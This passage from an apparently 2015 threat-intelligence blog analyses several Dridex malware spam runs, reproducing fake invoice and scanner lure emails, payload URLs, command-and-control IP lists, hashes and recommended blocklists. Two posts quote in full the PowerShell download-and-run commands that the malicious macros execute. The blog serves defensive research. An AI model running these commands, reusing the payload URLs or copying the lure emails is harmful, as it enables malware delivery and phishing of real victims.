zybikvovana.ga
zybikvovana.gq
zybikvovana.ml
zybikvovana.tk
zybikvovki.cf
zybikvovki.ga
zybikvovki.gq
zybikvovki.ml
zybikvovki.tk
staffrc.com
stopudof.com
35igr.ru
adandc.ru
avgyst.ru
comedy24.ru
e7ya.ru
funrussia.ru
ladykafe.ru
med-cafe.ru
mykazantip.ru
ohotaforum.ru
powerpoint-ppt.ru
sibledy.ru
turistvip.ru
ya-pisatel.ru
kypitest.ru
anykadavai.tk
forwarditaly.org
getyourimesh.com
mymobi.ml
yellowfrance.org

Sites that are flagged as malware by Google are highlighted and these are all hosted on 184.105.163.243. But what was interesting was what White Falcon Communications have been hosting in the past. When I ran the entirety of all the sites from DNSDB through my checker, I got some interesting results* [csv].

Out of 2867 sites analysed, 1973 (69%) sites had either hosted malware or were spammy. Some of the unrated sites are clearly phishing sites (e.g. usabanksecurity.com). Although these sites are not hosted on White Falcon Communications IPs now, they all have been at some point in the past.

So, who is this outfit? Well, it didn't take to come up with a couple of news stories, firstly this one where White Falcon had been raided by police in Canada in connection with C2 infrastructure for the Citadel botnet. That was followed by this story where White Falcon was allegedly suing law enforcement back, due to alleged "negligence".

However, given the sheer volume of crap that White Falcon has hosted in the past and its current problem with exploit kits, I would definitely recommend blocking traffic to 184.105.163.192/26 to be on the safe side.

* fields are domain name, current IP address, MyWOT ratings, Google Safebrowsing rating, SURBL status.

Wednesday, 8 April 2015

Malware spam: "Invoice from COMPANY NAME" / 31.24.30.12 / 46.30.43.102

This Dridex spam takes a slightly different approach from other recent ones. Instead of attaching a malicious Office document, it downloads it from a compromised server instead.

The example I saw read:
From:    Mitchel Levy
Date:    8 April 2015 at 13:45
Subject:    Invoice from MOTHERCARE

Your latest invoice is now available for download. We kindly advise you to pay the invoice in time.

Download your invoice here.

Thanks for attention. We appreciate your business.
If you have any queries, please do not hesitate to contact us.

Mitchel Levy, MOTHERCARE
The link in the email has an address using the domain afinanceei.com plus a subdomain based on the recipients email address. It also has the recipients email address embedded in the URL, for example:

http://victimbfe.afinanceei.com/victim@victim.domain/

This is hosted on 31.24.30.12 (Granat Studio / Tomgate LLC, Russia) and it leads to a landing page that looks like this:

I guess perhaps the bad guys didn't notice "Califonia Institute of Technology" written behind "Information Management Systems & Services". The link in the email downloads a file from:

http://31.24.30.12/api/Invoice.xls

At the moment the download server seems very unstable and is generating a lot of 500 errors. Incidentally, http://31.24.30.12/api/ shows a fake page pretending to be from Australian retailer Kogan.



As you might guess, Invoice.xls contains a malicious macro [pastebin] but the real action is some data hidden in the spreadsheet itself:


That's pretty easy to decode, and it instructs the computer to download a malicious binary from:

http://46.30.43.102/cves/kase.jpg

This is saved as %TEMP%\dfsdfff.exe. Unsurprisingly, 46.30.43.102 is another Russian IP, this time EuroByte LLC.

This binary has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] [4] show it communicating with the following IPs:

109.74.146.18 (VNET a.s., Bulgaria)
176.81.92.142 (Telefonica, Spain)
147.96.6.154 (Universidad Complutense De Madrid, Spain)
199.201.121.169 (Synaptica, Canada)
210.205.126.189 (Nowonwoman, Korea)
37.58.49.37 (Leaseweb, Germany)
87.117.229.29 (iomart, UK)
108.61.189.99 (Choopa LLC, US)
116.75.106.118 (Hathway, India)
107.191.46.222 (Choopa LLC, Canada)

In addition there are some Akamai IPs which look benign:

184.25.56.212
184.25.56.205
2.22.234.90

According to this Malwr report it drops several files including a malicious Dridex DLL which is the same one found in this attack.

Recommended blocklist:
109.74.146.18
176.81.92.142
147.96.6.154
199.201.121.169
210.205.126.189
37.58.49.37
87.117.229.29
108.61.189.99
116.75.106.118
107.191.46.222
46.30.43.102
31.24.30.12

MD5s:
e8cd8be37e30c9ad869136534f358fc5
671c65cedc8642adf70ada3f74d5da19
a4af11437798b7de5a0884623ed42478

UPDATE 1:

There is at least one other server at  95.163.121.22 (Digital Networks CJSC aka DINETHOSTING, Russia) being used as a location to click through to (I recommend you block the entire 95.163.121.0/24 range). Between those two servers I can see the domains listed below in use. I suspect that there are others given the limited alphabetic range

abiliingfinance.com
abilingffinance.com
abilingfienance.com
abilingfinaance.com
abilingfinancee.com
abilingfinancey.com
abilingfinnance.com
abilingggfinance.com
abilinngfinance.com
afinanccebifling.com
afinanccebiling.com
afinanceas.com
afinancebbi.com
afinancebill.com
afinancecc.com
afinanceebb.com
afinanceei.com
afinancei.com
afinanceobilhing.com
afinanceobiling.com
afinanceqbilzing.com
afinancesh.com
afinancewbidling.com
afinanceyer.com
afinancrebiling.com
afinancrebixling.com
afinandebiling.com
afinangebiling.com
afinangebilqing.com
afinanrebileing.com
afinanrebiling.com
afinansebiling.com
afinansebilling.com
afinanwebiling.com
afinanwebilsing.com
asfinancebbi.com
asfinancebill.com
asfinancecc.com
asfinancee.com
asfinanceebb.com
asfinanceei.com
asfinancei.com
asfinancesh.com
asfinanceyer.com
assfinanceas.com
bbbilingfinancee.com
bbiliingfinance.com
bbilingffinance.com
bbilingfienance.com
bbilingfinaance.com
bbilingfinancee.com
bbilingfinancey.com
bbilingfinnance.com
bbilingggfinance.com
bbilinngfinance.com
bbillingfinance.com
biliingfinance.com
bilingffinance.com
bilingfienance.com
bilingfinaance.com
bilingfinancee.com
bilingfinancey.com
bilingfinnance.com
bilingggfinance.com
bilinngfinance.com
cfinanccebifling.com
cfinanceobilhing.com
cfinanceqbilzing.com
cfinancewbidling.com
cfinancrebixling.com
cfinandebilping.com
cfinangebilqing.com
cfinansebilling.com
cfinanwebilsing.com
financcebifling.com
financcebiling.com
financeobilhing.com
financeobiling.com
financeqbilzing.com
financewbidling.com
financewbiling.com
financrebiling.com
financrebixling.com
finandebilping.com
finangebiling.com
finangebilqing.com
finanrebileing.com
finanrebiling.com
finansebiling.com
finansebilling.com
finanwebiling.com
finanwebilsing.com

Thursday, 2 April 2015

Malware spam: "Scanned document from HP/Brother/Epson Scanner [87654321]"

These fake scanner emails follow a well-established pattern. Instead of containing a scanned document they have a malicious attachment.

Now.. if you are reading this then you are probably not the sort of person who would open an unsolicited message of this sort. Would you?

From:    Cindy Pate [Caroline.dfd@flexmail.eu]
Date:    2 April 2015 at 11:09
Subject:    Scanned document from HP Scanner [66684798]

Reply to: HP-Scanner@flexmail.eu
Model:KX-240NGZDC
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Sterling Hoffman [Lara.dc4@astroexports.com]
Date:    2 April 2015 at 11:00
Subject:    Scanned document from Brother Scanner [07623989]

Reply to: Brother-Scanner@astroexports.com
Model:CG-240NWDUL
Location: 1st Floor Office

File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Manuel Velez [Yesenia.10@acv.nl]
Date:    2 April 2015 at 12:04
Subject:    Scanned document from Epson Scanner [81829722]

Reply to: Epson-Scanner@acv.nl
Model:JS-240NRZYV
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

I have seen three different malicious attachments with low detection rates [1] [2] [3] which appear to contain one of two macros [1] [2] which download a further component from one of the following locations:

http://93.158.117.163:8080/bz1gs9/kansp.jpg
http://78.47.87.131:8080/bz1gs9/kansp.jpg


Those servers are almost definitely malicious in other ways, the IPs are allocated to:

93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)

This is then saved as %TEMP%\sdfsdffff.exe which has a VirusTotal detection rate of just 1/56. Automated analysis [1] [2] [3] indicates that it calls home to:

188.120.225.17 (TheFirst-RU, Russia)
92.63.88.83 (MWTV, Latvia)
121.50.43.175 (Tsukaeru.net, Japan)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
82.151.131.129 (Doruknet, Turkey)
46.19.143.151 (Private Layer Inc, Switzerland)
45.55.154.235 (Digital Ocean, US)
195.130.118.92 (University Of Ioannina, Greece)
199.201.121.169 (Synaptica, Canada)
95.211.168.10 (Leaseweb, Netherlands)
222.234.230.239 (Hanaro Telecom, Korea)

Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.

Recommended blocklist:
188.120.225.17
92.63.88.0/24
121.50.43.175
95.163.121.0/24
82.151.131.129
46.19.143.151
45.55.154.235
195.130.118.92
199.201.121.169
95.211.168.10
222.234.230.239
93.158.117.163
78.47.87.131

MD5s:
96f3aa2402daf9093ef0b47943361231
cff4b8b7f9adf1f5964b495a8116d196
68fb9aadda63d18f1b085d5bd8815223
64fa6501bd4d32b2958922598008ca96


Wednesday, 1 April 2015

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Tuesday, 31 March 2015

Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number
Date
Invoice Number
Document Total
Document Type
49487999
31-Mar-2015
659751716
£1133.90  
Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get
your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169